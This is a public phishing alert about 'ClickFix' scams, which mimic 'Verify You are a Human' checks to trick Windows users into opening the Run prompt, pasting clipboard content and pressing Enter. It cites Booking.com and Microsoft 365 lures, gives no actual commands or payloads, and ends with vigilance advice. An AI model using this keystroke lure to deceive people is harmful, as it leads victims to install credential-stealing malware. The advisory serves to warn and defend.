Skip to main content

Phishing Alert - Surge in Phishing Attacks Utilizing ClickFix Tactics

Release Date: 17 Mar 2025 394 Views

Type: Phishing

Phishing Alert

Current Status and Related Trends

Recent threat intelligence indicates a significant rise in phishing attacks employing a new tactic known as "ClickFix." The "ClickFix" scam mimics the "Verify You are a Human" tests that websites commonly use to differentiate real users from bots. Users are asked to pass the test by pressing specific keyboard keys. This action triggers the download of malware on Microsoft Windows. 

 

Detail Step of ClickFix deceptive action are illustrated below:

 

Step 1 - requires the user to press the keyboard key with the Windows icon and the letter “R” simultaneously, which opens a Windows “Run” prompt capable of executing any program already installed on the system.

 

Step 2 - instructs the user to press the “CTRL” key and the letter “V” at the same time, thereby pasting malicious code from the site’s virtual clipboard.

 

Step 3 - involves pressing the “Enter” key, prompting Windows to download and execute malicious code

 

 

 

ClickFix tactic has become widespread in recent months including attacks targeting hospitality workers, where cybercriminals impersonate Booking.com to deliver credential-stealing malware. These phishing emails often reference negative guest reviews or promotional opportunities, enticing users to engage with malicious content that ultimately leads to malware installation. It has also been observed in attack targeting Microsoft 365 accounts with a fake Microsoft OAuth webpage. 

Recommendations

Organisations and individuals are urged to remain vigilant against these evolving phishing threats and to implement robust security measures to protect sensitive information. User should always verify the authenticity of emails and links before clicking especially if the sender's email domain is different from the official domain of the organisation they represent. 

Related Tags